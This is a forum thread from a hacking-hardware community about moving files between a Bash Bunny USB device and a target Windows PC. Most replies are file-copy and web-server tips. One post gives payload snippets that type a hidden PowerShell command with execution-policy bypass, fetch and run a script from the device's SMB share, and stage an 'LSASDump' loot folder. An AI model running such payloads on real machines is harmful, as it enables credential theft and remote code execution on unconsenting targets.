Mr.Pupp3T Posted March 31, 2017 Share Posted March 31, 2017 Hey guys im trying to figure out a simple code .. so if i have /root/tesing/test.txt How would i go about of taking that TEXT document on my BB and putting it in there documents folder? Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted March 31, 2017 Share Posted March 31, 2017 Powershell would probably be the best way. Maybe not the most efficient... Create a powershell script that is run by the payload.txt that says something like: Copy-Item -Path "/root/testing/test.txt" -Destination [Environment]::GetFolderPath("MyDocuments") -Force Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer... Quote Link to comment Share on other sites More sharing options...
JBNZ Posted March 31, 2017 Share Posted March 31, 2017 5 hours ago, Dave-ee Jones said: Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer... Presumably you'd want to expose the file to the target either as a USB storage device and address it that way, or by running a server on the BB and accessing the file over the network. 1 Quote Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted March 31, 2017 Author Share Posted March 31, 2017 Thanks guys I'll give that a shot Quote Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted March 31, 2017 Author Share Posted March 31, 2017 12 hours ago, Dave-ee Jones said: Powershell would probably be the best way. Maybe not the most efficient... Create a powershell script that is run by the payload.txt that says something like: Copy-Item -Path "/root/testing/test.txt" -Destination [Environment]::GetFolderPath("MyDocuments") -Force Not sure if that will actually work as "/root/testing/text.txt" is a *nix path for the BB, you can't really access it from Windows Explorer... Yea that's what I was looking over I know you can access the libary file so maybe in there will work Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 1, 2017 Share Posted April 1, 2017 17 hours ago, JBNZ said: Presumably you'd want to expose the file to the target either as a USB storage device and address it that way, or by running a server on the BB and accessing the file over the network. How would you access the file via a server on the BB? I'm interested to know as I'm making a webserver payload, and I want it to be able to access files on the BB and client. Quote Link to comment Share on other sites More sharing options...
JBNZ Posted April 1, 2017 Share Posted April 1, 2017 (edited) 3 hours ago, Dave-ee Jones said: How would you access the file via a server on the BB? I'm interested to know as I'm making a webserver payload, and I want it to be able to access files on the BB and client. A simple and terrible example would be a payload which contained simply: ATTACKMODE ECM_ETHERNET python -m SimpleHTTPServer Once this executes, the full bunny filesystem is exposed to the target on on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port. Edited April 1, 2017 by JBNZ Quote Dave-ee to trigger notification of reply. Quote Link to comment Share on other sites More sharing options...
MaxDamage Posted April 1, 2017 Share Posted April 1, 2017 I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share. Quote Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted April 1, 2017 Author Share Posted April 1, 2017 5 hours ago, JBNZ said: A simple and terrible example would be a payload which contained simply: ATTACKMODE ECM_ETHERNET python -m SimpleHTTPServer Once this executes, the full bunny filesystem is exposed to the target on on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port. 3 hours ago, MaxDamage said: I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share. Hmm, I'll try an see what I can do with that maybe there is a way of blocking the rest? but yes I don't use bash a lot so that's why I'm asking for help :) so thanks, guys I really appreciate all your help! Quote Link to comment Share on other sites More sharing options...
Mr.Pupp3T Posted April 2, 2017 Author Share Posted April 2, 2017 16 hours ago, MaxDamage said: I have used the python SMB server like Darren did in the SMB_Exfil payload and then used Powershell to pull the file or run direct from the SMB share. So pretty much get the server setup and then tell it to take the file from my BB an copy it too the computer, because if the BB can access 172.16.64.1 like darren did it can copy that file from the bashbunny over to documents or whatever correcT? Quote Link to comment Share on other sites More sharing options...
MaxDamage Posted April 2, 2017 Share Posted April 2, 2017 Yes that is what I did: here are some snippets from the payload I am working on: In Payload.txt, do not forget to install tools... /pentest/impacket/examples/smbserver.py -comment '...' b /loot/dump QUACK STRING "powershell -WindowStyle Hidden -NoLogo -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\b\run.ps1; exit } }\"" In my powershell script 'Run.ps1': #Wait for SMB to get going while (!(Test-Path "\\172.16.64.1\b\udisk\loot\LSASDump\")){ Start-Sleep 2 $I++ if ($I -eq 10) {break} # dont wait too long..... } # Loot Directory [String]$p = '\\172.16.64.1\b\udisk\loot\LSASDump\' if (!(Test-Path $P)) {New-Item -Path $P -type directory | Out-Null} I haven't published as I am still testing but these should help. Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted April 3, 2017 Share Posted April 3, 2017 On 4/1/2017 at 6:38 PM, JBNZ said: A simple and terrible example would be a payload which contained simply: ATTACKMODE ECM_ETHERNET python -m SimpleHTTPServer Once this executes, the full bunny filesystem is exposed to the target on on http://172.16.64.1:8000/, which is the bunny's default IP and SimpleHTTPServer's default port. Options to SimpleHTTPServer would let you better specify a directory to serve from and an alternative port. Ah so kind of like an FTP server but not...Interesting. I've been using Powershell's webserver capabilities which don't easily allow you to access the files...Can you set up HTML/CSS styles for the python server or no? Quote Link to comment Share on other sites More sharing options...
JBNZ Posted April 3, 2017 Share Posted April 3, 2017 6 hours ago, Dave-ee Jones said: Ah so kind of like an FTP server but not...Interesting. I've been using Powershell's webserver capabilities which don't easily allow you to access the files...Can you set up HTML/CSS styles for the python server or no? Yeah it will, it's a pretty standard webserver. If you serve a directory, it'll look for an index.html and serve that first. Alternatively, you can select any HTML file and serve that explicitly. More detail at https://docs.python.org/2/library/simplehttpserver.html Where are you running PowerShell? Have you installed it on the bunny or are you trying to run a web server on the target host? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.